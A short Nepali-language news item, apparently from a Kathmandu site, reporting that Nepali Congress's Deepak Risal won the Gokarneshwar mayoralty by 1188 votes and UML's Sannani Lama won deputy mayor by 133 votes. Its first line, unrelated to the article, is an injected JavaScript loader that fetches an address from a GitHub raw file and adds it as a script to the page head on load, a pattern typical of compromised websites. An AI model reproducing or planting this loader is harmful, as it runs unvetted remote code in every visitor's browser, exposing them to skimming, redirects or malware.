;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ।
काठमाडौं जिल्ला गोकर्णेश्वर नगरपालिकामा नेपाली काँग्रेस पार्टीबाट दीपक रिसालको विजय भएको छ। उनले मेयरमा आफ्ना प्रतिस्पर्धी एमालेका उद्धव विष्टलाई ११८८ मतले पछाडी परेका हुन्।
अमूल्य मत दिएर विजय गराउने सम्पूर्ण मतदातालाई धन्यवाद समेत दिएका छन्। साथै चुनावी दौरानमा सहयोग गर्ने सम्पूर्णलाई पनि धन्यवाद दिएका छन् ।
त्यसै गरी गोकर्णेश्वर नगरपालिका उप मेयरमा एमालेबाट सान्नानी लामा विजय भएकी हुन। १३३ मतान्तरले कांग्रेसकी उम्मेदवार शान्ति नेपाल पराजय भएकी हुन ।
फेसबुक प्रतिक्रियाहरु